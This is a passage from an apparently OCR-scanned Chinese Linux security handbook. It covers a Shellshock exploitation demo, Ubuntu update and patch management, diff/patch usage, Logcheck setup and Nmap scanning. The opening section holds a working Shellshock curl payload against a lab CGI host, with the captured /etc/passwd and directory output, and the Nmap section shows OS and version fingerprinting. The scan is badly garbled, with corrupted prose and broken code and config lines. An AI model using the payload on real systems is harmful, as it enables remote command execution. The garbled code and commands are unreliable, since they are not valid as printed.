news :x:9:9:news:/var/spool /news : /bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp: /bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 

www -data:x:33:33:www-data: /var/www: /bin/sh 


tajinder:x:1000:1000:Tajinder,,,:/home/tajinder:/bin/bash 
userl:x:1001:1001 : : /home/userl:/bin/bash 
sshd:x:115:65534: :/var/run/sshd: /usr/sbin/nologin 


可 以 看 到 攻击 者 系统 中 输出 了 目标 机 的 /etc/passwd 文 件 内 容 。 这 个 例子 展示 了 如 何 利用 Shellshock 漏 洞 远程 访问 目标 机 系 
统 。 在 上 面 的 命令 中 ，() {: ; E 表示 的 是 一 个 看 起 来 像 个 消 数 的 变量 。 在 这 段 代 码 中 ， 该 消 数 是 一 个 单一 的 “: ”， 它 什么 
都 不 做 ， / 只 是 一 个 简单 的 命令 Zo 


5, 尝试 另 一 个 命令 来 查看 受害 者 系统 当前 目录 的 内 容 ， 如 下 所 示 : 


tOkali:~/Desktop# curl -A '() ( :;}; echo "Content-type: text/plain"; echo; 
aE -al' http://192.168.1.104/cgi -bin/example.sh 

total 44 

drwxr-xr-x 2 root root. 4096 Feb 12 14:12 . 


drwxr-xr-x 1/0 root root 36864 Feb 12214501... 
-rwxr-xnr-x F root root 70 Feb 12 14:12 example.sh 
ra H: ~/Desktop# 


在 前 面 的 输出 中 ， 看 到 受害 者 系统 的 根 目 录 的 内 容 。 

在 SSH 服 务 器 系统 上 ， 我 们 创建 一 个 新 的 用 户 账号 ， 并 将 bash shell 指 定 为 它 的 默认 shell。 然 后 在 /home 中 为 新 用 户 创建 一 
个 目录 ， 并 将 其 所 有 权 分 配给 此 账号 。 

接 下 来 ， 我 们 配置 SSH 服 务 器 系统 ， 使 其 能 够 验证 通过 授权 密 钥 和 连接 它 的 其 他 系统 。 

然后 ， 创 建 一 个 bash 脚 本 来 限制 特定 的 命令 ， 如 date， 并 使 用 命令 选项 将 此 脚本 的 路 径 添加 到 authorized_keys 文 件 。 


之 后 ， 我 们 尝试 从 之 前 配置 了 授权 密 钥 的 其 他 系统 连接 到 SSH 服 务 器 。 如 果 在 连接 时 将 date 命 令 作为 参数 传递 ， 则 该 命令 受 


到 限制 。 


但 是 ， 当 同一 个 date 命 令 与 Shellshock 雇 洞 利用 代码 一 起 传递 时 ， 我 们 会 看 到 date 命 令 的 输出 ， 这 展示 了 如 何 利用 
Shellshock 来 攻击 SSH 服 务 器 。 


类 似 地 ， 我 们 也 可 以 通过 创建 一 个 示例 脚本 并 将 其 放 在 Apache 系 统 的 /usr/lib/cgi-bin 目 录 中 来 利用 Apache 服 务 器 。 然 
后 ,尝试 使 用 curl 工 具 从 其 他 系统 访问 此 脚本 。 


如 果 通 过 curl 访 问 脚本 时 传递 了 一 个 Shellshock 漏 洞 ， 就 可 以 远程 地 在 Apache 服 务 器 上 运行 命令 。 


9.3 补丁 管理 系统 


在 目前 的 计算 方案 中 ， 漏 洞 和 补丁 管理 是 永 无 止境 的 循环 过 程 。 当 计算 机 由 于 已 若 漏洞 而 受到 攻击 时 ， 这 种 漏洞 的 补丁 已 经 
人 存 企 ， 然 而 由 于 漏洞 补丁 没有 人 在 系统 正确 安装， 因而 导致 了 攻击 。 


作为 系统 管理 者 ， 必 须知 道 哪些 补丁 需要 安装， 哪些 应 该 忽略 。 
准备 工作 

由 于 可 以 使 用 内 置 的 Linux 工 具 完 成 补丁 管理 ， 因 此 在 执行 步骤 之 前 ， 不 需要 进行 特别 的 设置 。 
操作 指南 


保持 系统 更 新 的 最 简单 和 最 有 效 的 方法 是 使 用 内 置 于 Linux 系 统 中 的 Update Manager。 在 这 里 ， 我 们 将 探讨 Ubuntu 系统 
中 Update Manager 的 工作 原理 : 


1. 要 打开 Ubuntu 中 的 Update Manager 的 图 形 版 本 ， 请 单 击 工 具 栏 左 侧 的 “Superkey”， 然 后 键入 update。 将 会 显 
zx "Update Manager” 的 图 标 : 


*| 6 update| 


fji Applications 


Update Gwibber Social 
Manager Client 


2.5]7TUpdate Manager， 将 出 现 以 下 对 话 框 ， 显 示 可 安装 的 各 种 安全 更 新 : 


software updates are available for this computer. 
| software updates correct errors, eliminate security vulnerabilities and 
| provide new features. 


i 


scripts For handling many ACPI events 
acpi-support (Size: 22 kB) 


ga Userspace parser utility For AppArmor 
2 334updates have been selected. 421.9 MB will be downloaded. 


A — - 
| Check | |Install Updates. 


选择 要 安装 的 更 新 ， 然 后 单 击 “Install Updates” 以 继续 。 
3. 在 该 窗口 上 ， 在 左下 角 有 一 个 “setting” 按 钮 。 单 击 它 会 出 现 一 个 新 的 软件 源 窗口 ， 将 会 显示 更 多 的 Update Manager 
配置 选项 。 


4. 第 一 个 选项 卡 读 取 Ubuntu 软 件 ， 显 示 下 载 更 新 所 需 的 资源 库 询 表 。 根 据 需求 ， 从 列表 中 选择 选项 : 


Software Sources 


Ubuntu Software | Other Software | Updates | Authentication | Statistics 


Downloadable from the Internet 


(€ Canonical-supported free and open-source software (main) 

(€ Community-maintained free and open-source software (universe) 
(€ Proprietary drivers for devices (restricted) 

(€ Software restricted by copyright or legal issues (multiverse) 


(B Source code 


Download from: | Server for India 7 


Installable from CD-ROM/DVD 


Cdrom with Ubuntu 12.04 'Precise Pangolin' 
Officially supported 
Restricted copyright 


Revert | Close | 


5. 如 果 单 击 了 “Downloaded from" 选项， 那么 可 以 选择 用 于 下 载 的 资源 服务 器 。 如 果 连 接 到 当前 所 选 的 服务 器 有 困难 或 
服务 器 速度 较 慢 ， 则 此 选项 非常 有 用 。 


Software Sources 


Ubuntu Software | Other Software | Updates | Authentication | Statistics 


Downloadable from the Internet 


| (€ Canonical-supported free and open-source software (main) 


(e Communiby-maintained free and open-source software (universe) 


| ( Proprietary drivers For devices (restricted) 


(€ Software restricted by copyright or legal issues (multiverse) 


Source code 
= Main server 


Download from: | Server For India 


Installable from C 


Cdrom with Ubuntu 12.04 'Precise Pangolin' 
Officially supported 
Restricted copyright 


| Revert | | Close | 


6. 当 从 下 拉 列 表 中 选择 “Otherhttp://www.hzcourse.com/resource/readBook? 
path=/openresources/teach ebook/uncompressed/17380/OEBPS/Text/...” 选 项 上 时， 将 会 得 到 一 个 列表 来 选择 我 们 需要 的 
服务 器 ， 如 下 图 所 示 : 


Choose a Download Server 


P Greenland Select Best Server. 
P Hong Kong 

P Hungary 

P Iceland | 


ftp.iitb.ac.in 


ftp.iiEm.ac.in 
mirror.cse.iitk.ac.in 
ubuntu.excellmedia.net 


Protocol: d 


| Cancel | Choose Server 


7. 下 一 个 选项 卡 “Other Software” 用 于 修改 合作 伙伴 资源 库 : 


Ubuntu Software | Other Software | Updates Authentication | Statistics 


a Canonical Partners 


Software packaged by Canonical For their partners 


— Canonical Partners (Source Code) 
Software packaged by Canonical For their partners 


Independent 
Provided by third-party software developers 


| Independent (Source Code) 
Provided by third-party software developers 


Add... Edit... Remove Add Volume... 


8. 可 以 从 上 图 所 示 的 列表 中 选择 任何 选项 ， 然 后 单 击 “Edit” 按 钮 以 更 改 人 资源 库 的 详细 信息 ， 如 下 所 示 : 


Edit Source 


Type: |Binary d 
URI: — http://archive.canonical.com/ubuntu 
Distribution: precise 
Components: | partner 


comment: 


| Cancel ams | 


9. 第 三 个 选项 卡 “Updates” 用 于 定义 Ubuntu 系统 如 何以 及 何 时 接收 更 新 : 


Software Sources 


Ubuntu Software | Other Software | Updates | Authentication | Statistics 


Install updates from: 


© Recommended updates (precise-updates) 
. | Pre-released updates (precise-proposed) 


(€ Unsupported updates (precise-backports) 


Automatically check for updates: | Daily d 
When there are security updates: | Display immediately M 
When there are other updates: | Display weekly d 


Notify me of a new Ubuntu version: | For long-term support versions — v 


| Revert || Close | 


10. 第 四 个 选项 卡 “Authentication ”包含 了 从 软件 资源 库 的 维护 者 处 获取 的 、 软 件 提供 者 的 验证 密 钥 的 详细 信息 : 


Software Sources 


Ubuntu Software Other Software | Updates | Authentication | Statistics 


Trusted software providers 
437D05B5 2004-09-12 
Ubuntu Archive Automatic Signing Key «ftpmaster(&ubuntu.com» 
| FBB75451 2004-12-30 | 

Ubuntu CD Image Automatic Signing Key «cdimage(»ubuntu.com» 
COB21F32 2012-05-11 

Ubuntu Archive Automatic Signing Key (2012) «Ftpmasteri&ubuntu.com» 
EFE21092 2012-05-11 

Ubuntu CD Image Automatic Signing Key (2012) <cdimage@ubuntu.com> 


| 3bE5C1192 2010-09-20 
Ubuntu Extras Archive Automatic Signing Key «ftpmaster&ubuntu.com» 


Import Key File... Remove Restore Defaults 


| Revert || Close | 


11. 最 后 一 个 选项 卡 是 统计 信息 “statistics” ， 用 于 希望 以 匿名 方式 向 Ubuntu 开 友 者 项 目 提供 数据 的 用 户 。 此 信息 有 助 于 
开 友 人 员 提 高 软件 性 能 并 改善 软件 的 体验 。 


Software Sources 


Ubuntu Software | Other Software | Updates | Authentication | Statistics 


| Submit statistical information _ 


To improve the user experience of Ubuntu please take part in the popularity 
contest. If you do so the list of installed software and how often it was used 
will be collected and sent anonymously to Ehe Ubuntu project on a weekly 
basis. 


The results are used to improve the support for popular applications and to 
rank applications in Ehe search results. 


|j Revert || Close | 


12. 更 改 上 述 任何 选项 卡 进行 后 ， 当 单 击 关闭 按钮 “Close” 时 ， 系 统 将 提示 你 可 用 软件 的 信息 需要 更 新 。 单 击 重 新 加 载 按 
tH "Reload" XIHA “Close” : 


The information about available software is out-of-date 


To install software and updates from newly added or changed sources, you have to 
reload the information about available software. 


You need a working internet connection to continue. 


13. 如 果 要 得 看 Update Manager 检 索 所 有 软件 包 的 位 置 列表 ， 可 以 查看 /etc/apt/sources.list 文 件 的 内 容 。 如 下 图 所 示 : 


#deb cdrom:[Ubuntu 12.04.4 LTS Precise Pangolin - Release i386 (20140204)]/ p$ 


# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to 
# newer versions of the distribution. 

deb http://in.archive.ubuntu.com/ubuntu/ precise main restricted 

deb-src http://in.archive.ubuntu.com/ubuntu/ precise main restricted 


## Major bug fix updates produced after the final release of the 

## distribution. 

deb http://in.archive.ubuntu.com/ubuntu/ precise-updates main restricted 
deb-src http://in.archive.ubuntu.com/ubuntu/ precise-updates main restricted 


原理 解析 
要 更 新 Linux 系 统 ， 我 们 可 以 使 用 Linux 友 行 版 内 置 的 更 新 管理 器 Update Manager 软 件 。 
在 Update Manager 中 ， 我 们 可 以 安装 所 有 可 用 的 更 新 ， 或 者 在 设置 窗口 中 根据 要 求 进行 配置 。 


在 软件 源 设 置 窗口 中 ， 我 们 可 以 显示 更 新 资源 库 询 表 ， 更 新 融 是 从 这 里 下 载 的 。 窗 口 的 第 二 个 选项 卡 可 以 添加 合作 伙伴 的 资 
源 库 。 使 用 下 一 个 选项 卡 ， 可 以 指定 什么 时 候 下 载 什么 样 的 更 新 。 我 们 还 可 以 使 用 设置 窗口 检查 软件 提供 商 的 身份 验证 密 钥 。 最 
后 一 个 选项 卡 是 统计 信息 ， 有 助 于 将 数据 友 送 给 Ubuntu 项 目 开发 人 员 ， 以 提高 软件 的 性 能 。 


9.4 在 Linux 系 统 上 应 用 补丁 


无 论 何 时 在 任何 软件 中 发 现 安全 漏洞 ， 开 上 有 友 者 都 会 为 该 软件 发 布 一 个 安全 补丁 ， 以 便 修 复 错误 。 通 常 ， 我 们 使 用 内 置 于 
Linux 中 的 Update Manager 来 应 用 安全 更 新 。 但 是 ， 对 于 通过 编译 源 代 码 安装 的 软件 ，Update Manager 可 能 帮助 不 大 。 


对 于 这 种 情况 ， 我 们 可 以 将 补丁 文件 应 用 到 原始 软件 的 源 代 码 ， 然 后 再 重新 编译 软件 。 
准备 工作 


由 于 将 使 用 Linux 的 内 置 命令 来 创建 和 应 用 补丁 ， 所 以 在 开始 以 下 步骤 之 前 ， 不 需要 做 任何 准备 工作 。 下 面 将 创建 一 个 示例 
C 程 序 ， 以 了 解 创 建 补丁 文件 的 过 程 。 


操作 指南 


在 本 节 中 ， 我 们 将 介绍 如 何 使 用 diff 命 令 为 程序 创建 补丁 ， 然 后 将 使 用 patch 命 令 应 用 补丁 。 


1. 第 一 步 是 创建 一 个 简单 的 程序， 命名 为 example.c， 输 出 “This is an example" ， 程 序 代码 如 下 所 示 : 


#include «estdio.h» 


int main() 


1 


printf("This is an exampleXn"); 


) 


2. 现 在 ， 创 建 一 个 example.c 的 副本 并 将 其 命名 为 example_new.c。 


3. 接 下 来 ,编辑 新 的 example_new.c 文 件 ， 为 其 添加 一 些 额 外 的 代码 行 ， 如 下 所 示 : 


#include «stdio.h» 


int main(int argc) 


{ 
printf("This is an example\n"); 


0; 


4. 现 在 ，example_new.c 可 以 被 认为 是 example.c 的 更 新 版 本 。 


5. 使 用 diff 命 令 创 建 一 个 补丁 文件 ， 将 其 命名 为 example.patch: 


root@client:~# diff -u example.c example new.c > example.patch 


root(client:-4 i 


6. 查 看 补丁 文件 的 内 容 ， 将 得 到 以 下 输出 结果 : 


A 


root@client:~# cat example.patch 

--- example.c 2816-02-11 12:18:15.244513862 +0530 

+++ example new.c 2016-02-11 12:20:22.7/64520384 +0530 
(d -1,9 +1,11 (Q6 

&include «stdio.h» 


-int main() 
«int main(int argc) 


i 
printf("This is an exampleXn"); 


xreturn 8; 
十 


) 


7. 在 应 用 补丁 之 前 ， 可 以 使 用 “-b” 选 项 备份 原始 文件 。 


root@client:~# patch -b < example.patch 

patching file example.c 

root@client:~# ls 

example.c  example.c.orig example new.c  example.patch 
rootüclient:-3i 


你 会 注意 到 ， 已 创建 了 一 个 新 的 example.c.orig 文 件 ， 这 就 是 备份 文件 。 
8. 在 执行 实际 的 修补 之 前 ， 可 以 测试 运行 补丁 文件 ， 以 检查 是 否 有 错误 。 为 此 ， 执 行 下 述 命令 : 


rootüclient:-Z patch --dry-run < example.patch 


patching file example.c 


如 果 没 有 收 到 任何 错误 信息 ， 则 表示 补丁 文件 可 以 在 原始 文件 上 运行 。 


9. 现 在 ,运行 以 下 命令 ,将 补丁 应 用 到 原始 文件 : 


patch < example.patch 


10. 应 用 补丁 后 ， 如 果 查 看 example.c 程 序 的 内 容 ， 将 看 到 它 已 经 更 新 ， 增 加 了 一 些 额外 的 代码 行 ， 正 如 example new.c 所 


root(üclient:-4 cat example.c 
#include <stdio.h> 


int main(int argc) 


11. 将 补丁 应 用 到 原始 文件 之 后 ， 如 果 和 希望 回 退 ， 可 以 使 用 “-R” 选 项 来 完成 : 


root@client:~# patch < example.patch 

patching file example.c 

root(client:-f 

rootüclient:-4 ls -l example.c 

-Fw-r--r-- 1 root root 89 Feb 11 12:24 example.c 


root(üclient:-Z 

rootüclient:-4 patch -R < example.patch 

patching file example.c 

rootüclient:-4 ls -Ll example.c 

-rw-r--r-- 1 root root 70 Feb 11 12:27 example.c 


从 上 面 的 输出 结果 可 以 看 到 修补 后 以 及 回 退 后 文件 大 小 的 差异 。 


我 们 首先 创建 一 个 C 程 序 。 然 后 ， 为 它 创 建 副 本 ， 并 添加 更 多 的 代码 行 ， 使 其 成 为 更 新 的 版 本 。 之 后 ， 使 用 diff 命 令 创 建 一 
个 补丁 文件 。 在 应 用 补丁 之 前 ， 通 过 测试 运行 来 检查 它 是 否 有 错误 。 


如 果 没 有 错误 ,我 们 则 使 用 patch 命 令 来 应 用 补丁 。 现 在 ,原始 文件 将 具有 与 更 新 的 版 本 文件 相同 的 内 容 。 


我 们 也 可 以 使 用 “-R” 选 项 来 回 退 补丁 应 用 。 


本 章 将 讨论 如 下 主题 : 
: 使 用 Logcheck 查 看 和 管理 日 志文 件 
: 使 用 Nmap 监 控 网 络 
使 用 Glances 监控 系统 
. 使 用 MultiTail 监 控 日 志 
- 使 用 系统 工具 Whowatch 
: 使 用 系统 工具 stat 
: 使 用 系统 工具 lsof 
- 使 用 系统 工具 strace 


: 使 用 Lynis 


10.1 使 用 Logcheck 便 看 管理 日 志文 件 


作为 已 理 员 ， 在 检查 系统 上 的 有 恶 巧 活动 或 任何 软件 问题 时 ， 日 志文 件 起 着 非常 重要 的 作用 。 然 而 ， 随 着 软件 数量 的 增加 ,， 8! 
建 的 日 志文 件数 量 也 增加 了 。 这 使 得 管理 员 很 难 正确 地 分 析 日 志文 件 。 


在 这 种 情况 下 ，Logcheck 成 为 帮助 管理 员 分 析 和 扫 摘 日 志文 件 的 重要 工具 。Logcheck 根 据 文 档 扫 摘 日 志 中 需要 天 注 的 部 
这 些 部 分 主要 是 工具 检测 到 的 安全 问题 。 


准备 工作 
在 Linux 系 统 上 使 用 Logcheck 没 有 特别 要 求 。 
操作 指南 


在 本 节 中 ， 我 们 将 了 解 如 何 根 据 要 求 安 沪 和 配置 Logcheck: 


1. 第 一 步 是 使 用 下 图 中 显示 的 命令 来 安装 软件 包 : 


rootüclient:-4 apt-get install Logcheck 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

The following extra packages will be installed: 
libipc-signal-perl libmime-types-perl libproc-waitstat-perl 
logcheck-database logtail mime-construct postfix 


Suggested packages: 
syslog-summary procmail postfix-mysql postfix-pgsql postfix-ldap 
postfix-pcre sasl2-bin dovecot-common postfix-cdb postfix-doc 

The following NEW packages will be installed: 
libipc-signal-perl libmime-types-perl libproc-waitstat-perl logcheck 
logcheck-database logtail mime-construct postfix 

© upgraded, 8 newly installed, © to remove and 330 not upgraded. 


2. 企 安家 过 程 中 ， 将 打开 一 个 窗口 ， 显 示 选 择 邮 件 服务 器 配置 类 型 的 信息 ， 如 下 图 所 示 : 
Postfix Configuration 


Please select the mail server configuration type that best meets your 
needs. 


No configuration: 

Should be chosen to leave the current configuration unchanged. 
Internet site: 

Mail is sent and received directly using SMTP. 

Internet with smarthost: 


Mail is received directly using SMTP or by running a utility such 

as fetchmail. Outgoing mail is sent using a smarthost. 

Satellite system: 

All mail is sent to another machine, called a 'smarthost', for 
delivery. 

Local only: 


3. 单 击 <Ok> 继 续 。 


4. 在 下 一 个 窗口 中 ， 选 择 Internet Site， 然 后 单 击 <Ok> 继 续 。 


-— = -- 四 i paee — - on mm - m -—- — E -— m 
[ ( 


General type of mail configuration: 


No configuration 
Internet with smarthost 


Satellite system 
Local only 


«Ok» «Cancels 


5. 安 装 完成 后 ， 需 要 更 改 配 置 文件 /etc/logcheck/logcheck.conf。 


6. 在 配置 文件 中 需要 编辑 的 第 一 项 内 容 是 日 期 /时 间 蕉 的 格式 ， 它 用 在 由 Logcheck 友 送 的 邮件 主题 中 。 


# Controls the format of date-/time-stamps in subject lines: 
# Alternatively, set the format to suit your locale 


DATE-"S(date + %Y-%m-%d *H:XM')" 


7. 接 下 来 ， 可 以 更 改 报告 等 级 (REPORTLEVEL) 变量 的 值 ， 以 便 根 据 要 求 控制 对 日 志 的 过 滤 。 有 三 个 可 用 的 选项 ， 黑 认 情 


况 下 ， 该 值 设 置 为 server。 


# Controls the level of filtering: 
# Can be Set to "workstation", "server" or "paranoid" for different 
# levels of filtering. Defaults to server if not set. 


REPORTLEVEL-2" server" 


A — 


Xu "workstation" POSA ZAGA, HETANA. Ne "paranoid" XjG-EÉEe3c S TEBUAREMERSRH. E31 
尽 可 能 少 的 服务 ， 并 且 更 详细 。 


8. 之 后 ， 玩 改 SENDMAILTO 变 量 的 值 ， 提 供电 子 邮件 地 址 ， 用 于 通过 电子 邮件 接收 日 志 。 


# Controls the address mail goes to: 


# *NOTE* the script does not set a default value for this variable! 
# Should be set to an offsite "emailaddress(isome.domain.tld" 


SENDMAILTO-"logcheck" 


9. 由 Logcheck 生 成 的 邮件 对 不 同 的 事件 使 用 不 同 的 主题 行 。 如 果 想 修改 这 些 主题 行 ， 可 以 编辑 如 下 显示 的 变量 值 : 


# Controls Subject: lines on Logcheck reports: 


ÉATTACKSUBJECT-" Security Alerts" 
KESECURITYSUBJECT-"Security Events" 
ÓEVENTSSUBJECT-2"System Events" 


10. 默 认 情况 下 ，Logcheck 使 用 /etc/logcheckylogcheck.logfiles 文 件 来 维护 要 监视 的 日 志文 件 列表 。 如 果 希 望 使 用 任何 其 
他 文件 来 定义 列表 ， 或 者 该 文件 处 于 其 他 位 置 ， 那 么 可 以 编辑 RULEDIR 变 量 来 定义 新 的 路 径 。 


# Controls the base directory for rules file location 
# This must be an absolute path 


"SRULEDIRz"/etc/logcheck" 


11. 除 了 /etc/logcheck/logcheck.logfiles 文 件 中 已 经 定义 的 文件 外 ， 如 果 还 希望 Logcheck 监 视 任 何其 他 特定 文件 ， 则 需要 
在 其 中 添加 一 个 条 目 ， 如 下 图 所 示 : 


# these files will be checked by logcheck 

# This has been tuned towards a default syslog install 
{var / Log/ syslog 

/var/log/auth.1log 

/var/log/boot.log 


12. 在 上 述 文件 中 ， 我 们 添加 了 /var/log/boot.log 这 一 行 。 


我 们 首先 安 站 Logcheck 软 件 包 ， 安 装 完 成 后 ， 编 辑 其 配置 文件 /etc/logcheck/logcheck.conf。 
在 配置 文件 中 ， 我 们 更 改 日 志 的 日 期 /时 间 惟 的 格式 ， 还 可 以 通过 修改 REPORTLEVEL 变 量 进行 过 滤 设 置 。 


接 下 来 ,编辑 SENDMAILTO 变 量 ， 并 输入 电子 邮件 地 址 以 接收 日 志 。 


最 后 ， 我 们 使 用 etc/logcheck/logcheck.logfiles 文 件 来 定义 要 由 Logcheck 监 视 的 日 志 。 


10.2 ”使 用 Nmap 监 控 网 络 


无 论 网 络 大 小 ， 网 络 监 控 和 安全 都 是 非常 重要 的 工作 。 对 网 络 进行 定期 监控 非常 重要 ， 这 样 可 以 保护 系统 免 受 攻击 ， 并 且 将 
病毒 和 有 恶意 软件 隅 绝 在 网 络 乙 外 。 


Nmap 是 网 络 映射 器 (Network mapper) 的 缩写 ， 是 一 个 免费 的 开源 工具 ， 可 用 于 监控 网 络 ， 它 是 系统 /网 络 管理 员 最 音 
使 用 的 工具 。Nmap 可 用 于 执行 安全 扫 摘 、 浏 览 网 络 ， 以 及 在 远程 系统 上 得 找 开放 的 闯 口 并 执行 网 络 审核 。 


准备 工作 


为 了 展示 Nmap 的 工作 原理 ， 我 们 至 少 需要 两 个 系统 来 组 成 一 个 小 型 网 络 。 在 其 中 一 个 系统 上 ， 我 们 将 安 半 Nmap 软 件 包 ， 
另 一 个 系统 将 用 作 目 标 主 机 进行 扫描。 


操作 指南 
在 本 节 中 ， 我 们 将 介绍 如 何 使 用 Nmap 执 行 不 同类 型 的 扫 摘 。 


1. 如 果 没 有 安装 Nmap 包 ， 那 么 第 一 步 束 是 安装 Nmap 软 件 包 。 为 此 ， 要 使 用 如 下 命令 : 


apt-get install nmap 


在 运行 上 面 的 命令 时 得 到 下 图 所 示 的 输出 结果 : 


root@tj-dev:~# apt-get install nmap 
Reading package lists... Done 
Building dependency tree 

Reading state information... Done 


The following NEW packages will be installed: 

nmap 
© upgraded, 1 newly installed, © to remove and 341 not upgraded. 
Need to get 1,623 kB of archives. 


2. 要 使 用 Nmap 执 行 简 单 的 扫描 ， 可 以 使 用 需要 扫 摘 系统 的 主机 名 或 |P 地 址 。 执 行 简单 扫 摘 所 用 的 命令 如 下 图 所 示 : 


rootütj-dev:-4 nmap 192.168.1.105 


Starting Nmap 5.21 ( http://nmap.org ) at 2016-02-18 10:04 IST 
Nmap scan report for 192.168.1.105 
Host is up (0.00054s latency). 
Not shown: 996 filtered ports 

STATE SERVICE 

open msrpc 

open netbios-ssn 

open microsoft-ds 

mysqL 

MAC Address: 90:00:4E:2F:AC:EF (Unknown) 


Nnap done: 1 IP address (1 host up) scanned in 4.76 seconds 


3. 在 前 面 的 例子 中 ， 正 在 扫描 的 系统 的 IP 地 址 是 192.168.1.105。 在 扫描 结果 中 ， 可 以 看 到 目标 系统 在 3306 端 口上 运行 
MySQL 数 据 库 服 务 器 。 


4.Nmap 也 可 以 用 来 扫描 自己 的 系统 。 为 此 ， 可 以 使 用 如 下 命令 : 
nmap localhost 


在 运行 上 面 的 命令 时 得 到 以 下 输出 结果 : 
root@tj-dev:~# nmap localhost 


Starting Nmap 5.21 ( http://nmap.org ) at 2016-02-18 10:06 IST 
Nmap scan report for localhost (127.0.0.1) 

Host is up (0.000014s latency). 

Not shown: 998 closed ports 

PORT STATE SERVICE 

53/tcp open domain 

631/tcp open ipp 


Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds 


5 .如果 要 使 用 相同 的 命令 扫描 多 个 系统 ， 可 以 按 下 面 的 命令 操作 : 
nmap 192.168.1.105 192.168.1.102 


可 以 在 以 下 输出 中 看 到 两 个 系统 的 扫 拉 结果 : 


root@tj-dev:~# nmap 192.168.1.105 192.168.1.102 


Starting Nmap 5.21 ( http://nmap.org ) at 2016-02-18 10:108 IST 
Nnap scan report for 192.168.1.105 

Host is up (0.00044s latency). 

Not shown: 997 filtered ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

MAC Address: 90:00:4E:2F:AC:EF (Unknown) 


Nmap scan report for 192.168.1.102 

Host is up (0.00058s latency). 

ALL 1000 scanned ports on 192.168.1.102 are closed 
MAC Address: 00:0C:29:35:02:9C (VMware) 


Nmap done: 2 IP addresses (2 hosts up) scanned in 4.81 seconds 


6 可 以 使 用 Nmap 扫 描 特定 的 网 络 ， 检 查 在 网 络 中 哪些 系统 正在 运行 ， 如 下 所 示 : 


nmap -SP 192.168.1.0/24 


当 使 用 “-sP” 选 项 执行 扫描 时 ，Nmap 将 跳 过 端口 检测 以 及 其 他 步骤 。 它 只 是 通过 执行 简单 的 ping 来 检查 网 络 中 哪些 系统 
在 开机 运行 。 


root@tj-dev:~# nmap -SP 192.168.1.0/24 


Starting Nmap 5.21 ( http://nmap.org ) at 2016-02-18 19:16 IST 
Nnap scan report for 192.168.1.1 

Host is up (0.054s latency). 

MAC Address: C4:E9:84:C7:3A:F4 (Unknown) 
Nmap scan report for 192.168.1.100 

Host is up (8.15s latency). 

MAC Address: 1C:56:FE:07:9C:D5 (Unknown) 
Nmap scan report for 192.168.1.1081 

Host is up. 

Nnap scan report for 192.168.1.102 

Host is up (8.08048s latency). 

MAC Address: 00:8C:29:35:02:9C (VMware) 
Nnap scan report for 192.168.1.103 

Host is up (0.090s latency). 


7 AURAR AREER EmA, ABALAR "-p" XuckzEieNmapiXidi&iExENSLI, SU RB: 


rootütj-dev:-4 nmap -p 22,80 192.168.1.102 


Starting Nmap 5.21 ( http://nmap.org ) at 2016-02-18 18:35 IST 
Nnap scan report for 192.168.1.102 


Host is up (8.0047s latency). 


PORT STATE SERVICE 

22/tcp open ssh 

80/tcp closed http 

MAC Address: 00:0C:29:35:02:9C (VMware) 


Nnap done: 1 IP address (1 host up) scanned in 0.22 seconds 


f£ ExSmblr, Nmapidi&iisL122$180, 'eJz5SSHBRSSTUIHTTP (Web 服 务 器 ) 服务 的 默认 并 口号 。 从 上 述 结果 可 以 看 
出 ,远程 系统 正在 运行 SSH， 但 HTTP 端 口 已 天 闭 。 因 此， 没有 正在 运行 的 Web 服 务 器 。 


8. 在 对 目标 系统 进行 扫描 时 ， 识 别 系统 上 的 操作 系统 非常 重要 ， 因 为 计 多 漏洞 可 用 于 特定 的 操作 系统 平台 。 要 知道 目标 系统 
的 操作 系统 类 型 ， 可 使 用 “-O” 选 项 ， 如 下 所 示 : 


nmap -O 192.168.1.105 


下 图 中 显示 的 结果 告诉 我 们 ， 目 标 系统 正在 运行 Windows 7 Ultimate 版 本 : 


Host script results: 

| nbstat: NetBIOS name: PC, NetBIOS user: «unknown», 
:4e:2f:ac:ef 

| smb-os-discovery: 

| OS: Windows 7 Ultimate 7608 (Windows 7 Ultimate 6.1) 
| | Name: WORKGROUPYPC 

| System time: 2016-83-01 11:22:54 UTC+5。5 

| 


 smbv2-enabled: Server supports SMBv2 protocol 


HOP RTT ADDRESS 
1 0.57 ms 192.168.1.105 


9. 从 上 面 的 例子 可 以 看 到 ， 通 过 使 用 “-p” 选 项 ， 可 以 查 到 哪个 端口 是 开放 的 。 现 在 ,假设 目标 系统 的 端口 22 是 开放 的 ， 这 
意味 着 SSH 正 在 系统 上 运行 。 如 果 现 在 想 检 查 远 程 系 统 上 SSH 服 务 的 版 本 ， 可 以 使 用 “-sV” 选 项 ， 如 下 图 所 示 : 


root(tj-dev:-4 nmap -sV 192.168.1.182 


Starting Nmap 5.21 ( http://nmap.org ) at 2016-02-18 10:49 IST 
Nmap scan report for 192.168.1.1982 
Host is up (0.00081s latency). 


Not shown: 999 closed ports 

PORT STATE SERVICE VERSION 

22/tcp open ssh OpenSSH 7.1p2 Debian 2 (protocol 2.0) 
MAC Address: 60:0C:29:35:02:9C (VMware) 

Service Info: OS: Linux 


原理 解析 


当 Nmap 只 对 一 个 IP 地 址 进行 扫 摘 时 ， 它 会 进行 基本 扫 摘 ， 并 告诉 我 们 在 目标 系统 上 开放 了 哪 蔡 闯 口 。 通 过 开放 的 闯 口 ， 我 
们 可 以 识别 在 系统 上 运行 的 服务 。 同 样 ， 通 过 提供 本 地 系统 的 IP 地 址 ，Nmap 可 用 于 扫 摘 本 地 系统 。 


通过 在 同一 个 令 中 提供 多 个 I|P 地 址 ，Nmap 可 用 于 同时 扫 摘 多 个 I|P 地 址 。 此 外 ， 使 用 “-sP” 选 项 ，Nmap 可 用 于 检查 在 网 
络 中 哪些 系统 在 开机 运行 。 


Nmap 还 可 以 通过 “-p” 选 项 扫 换 特定 端口 ， 如 果 使 用 “-O” 选 项 ， 则 会 对 目标 系统 进行 指纹 读 取 ， 以 确认 目标 系统 上 所 
运行 的 操作 系统 。 


Nmap 还 可 以 执行 其 他 操作 ， 例 如 识别 目标 系统 上 所 运行 的 服务 软件 版 本 。 


10.3 ”使 用 Glances 监 控 系 统 


